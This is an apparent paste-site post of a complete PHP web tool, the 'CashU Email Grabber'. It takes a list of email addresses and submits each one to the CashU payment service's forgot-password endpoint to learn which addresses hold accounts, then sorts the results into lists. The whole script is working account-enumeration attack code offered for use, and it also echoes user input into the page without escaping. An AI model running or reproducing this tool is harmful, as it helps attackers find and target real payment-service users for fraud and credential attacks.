Joker's Services - JokerDarkKnight - CashU Email Grabber


SUBMITTED BY: Guest

DATE: Oct. 3, 2014, 5:59 a.m.

FORMAT: Text only

SIZE: 6.2 kB

HITS: 995

  1. <?php
  2. # ===================================================== #
  3. # #
  4. # ===================================================== #
  5. # contact : willageuro@gmail.com #
  6. # (Forum.guiadohacker.com.br) #
  7. # ===================================================== #
  8. @set_time_limit(0);
  9. if(!file_exists("CashUGrabberCookieFile.txt")){
  10. $fp = @fopen('CashUGrabberCookieFile.txt','w');
  11. @fclose($fp);
  12. }
  13. function curl($url='',$var='',$Follow=False){
  14. global $set;
  15. $curl = curl_init();
  16. curl_setopt($curl, CURLOPT_URL, $url);
  17. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
  18. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
  19. curl_setopt($curl, CURLOPT_REFERER, 'https://www.cashu.com/CLogin/forgetPassword');
  20. if($var) {
  21. curl_setopt($curl, CURLOPT_POST, 1);
  22. curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
  23. }
  24. curl_setopt($curl, CURLOPT_COOKIE,'CashUGrabberCookieFile.txt');
  25. curl_setopt($curl, CURLOPT_COOKIEFILE,'CashUGrabberCookieFile.txt');
  26. curl_setopt($curl, CURLOPT_COOKIEJAR,'CashUGrabberCookieFile.txt');
  27. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  28. curl_setopt($curl, CURLOPT_HEADER, 0);
  29. curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
  30. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  31. if ($Follow !== False) {
  32. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
  33. }
  34. $result = curl_exec($curl);
  35. curl_close($curl);
  36. return $result;
  37. }
  38. echo "<head>
  39. <style type=\"text/css\"><!--
  40. body,td,th {
  41. font-family: Courier New;
  42. font-size: 12px;
  43. color: #636161;
  44. }
  45. body {
  46. background-color: #0D0C0C;
  47. }
  48. a {
  49. font-size: 12px;
  50. }
  51. a:link {
  52. text-decoration: none;
  53. color: #666666;
  54. }
  55. a:visited {
  56. text-decoration: none;
  57. color: #666666;
  58. }
  59. a:hover {
  60. text-decoration: none;
  61. }
  62. a:active {
  63. text-decoration: none;
  64. }
  65. h1,h2,h3,h4,h5,h6 {
  66. font-style: italic;
  67. }
  68. --></style>
  69. <title>CashU Email Grabber - ".$_SERVER['HTTP_HOST']."</title>
  70. </head><div align=\"center\"><pre><font color=\"#FFFFFF\" size=\"3\">=====================================================</font><font size=\"3\">
  71. ## ## ## ##### #### ##### #### ## ## ## ##
  72. ## ## ## ## ## ## ## ## ## ## ## ## ## ##
  73. ####### ###### ## ## ## ## ## ## ###### ######
  74. ## ## ## ## ## ## ## ## ## ## ## ##
  75. ## ## ## ## ##### #### ##### #### ## ##
  76. </font><font color=\"#FFFFFF\" size=\"3\">=====================================================</font></pre>
  77. </center>";
  78. $emails = $_POST['emails'];
  79. print '<form method="POST">
  80. <p><span style="font-size: 15pt"><font color="#FFFFFF">CashU</font> Email Grabber </span></p>
  81. <p>Emails (<font color="#FFFFFF">That you want to check !</font> )<br><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
  82. <p><input type="submit" value="Submit" name="B1"></p>
  83. </form>';
  84. if (!empty($emails)) {
  85. $emails = explode("\r\n", $emails);
  86. $yes = 0;
  87. $not = 0;
  88. $inv = 0;
  89. $count = 1;
  90. print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
  91. foreach ( $emails as $email ) {
  92. $email = trim($email);
  93. print $count .". Checking <font color=\"#FFFFFF\">".$email."</font> ..... <b>";
  94. $count++;
  95. if(filter_var($email, FILTER_VALIDATE_EMAIL)){
  96. $_CheckAction = curl('https://www.cashu.com/CLogin/forgetPasswordNext','userEmail='.$email,TRUE);
  97. if(strpos($_CheckAction, "forgetPasswordConfirmation")) {
  98. print "<font size=\"3\" color=\"#FFFFFF\">Yes</font></b> <br>";
  99. $yes++;
  100. $vaild_yes .=$email."\n";
  101. }
  102. else {
  103. print "<font color=\"#FF0000\">NO</font><br>";
  104. $not++;
  105. $vaild_no .=$email."\n";
  106. }
  107. }
  108. else {
  109. print "<font color=\"#FF0000\">Invaild email</font><br>";
  110. $inv++;
  111. $invaild .=$email."\n";
  112. }
  113. }
  114. print '</p><p><table border="1" width="100%">
  115. <tr>
  116. <td>CashU emails (<font color="#FFFFFF"><b>'.$yes.'</b></font>)</td>
  117. <td>Not CashU emails (<font color="#FFFFFF"><b>'.$not.'</b></font>)</td>
  118. <td>Invalid emails (<font color="#FFFFFF"><b>'.$inv.'</b></font>)</td>
  119. </tr>
  120. <tr>
  121. <td><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></td>
  122. <td><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></td>
  123. <td><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></td>
  124. </tr>
  125. </table></p>';
  126. }
  127. print "<p>&nbsp;</p>
  128. <p>Copyright [<font color=\"#FFFFFF\">2013</font>-<font color=\"#FFFFFF\">2014</font>]<font color=\"#FFFFFF\"> </font>
  129. to<font color=\"#FFFFFF\"> </font>(<font color=\"#FFFFFF\"><a href=\"http://www.xtoolsx.com\">XtoolsX.com</a></font>)<font color=\"#FFFFFF\">
  130. - Hadidi44</font></p>
  131. <p>Contact : <font color=\"#FFFFFF\">Hadidi44</font>[at]<font color=\"#FFFFFF\">ymail</font>[dot]<font color=\"#FFFFFF\">com</font></p>
  132. <p>&nbsp;</p></div>";
  133. ?>

comments powered by Disqus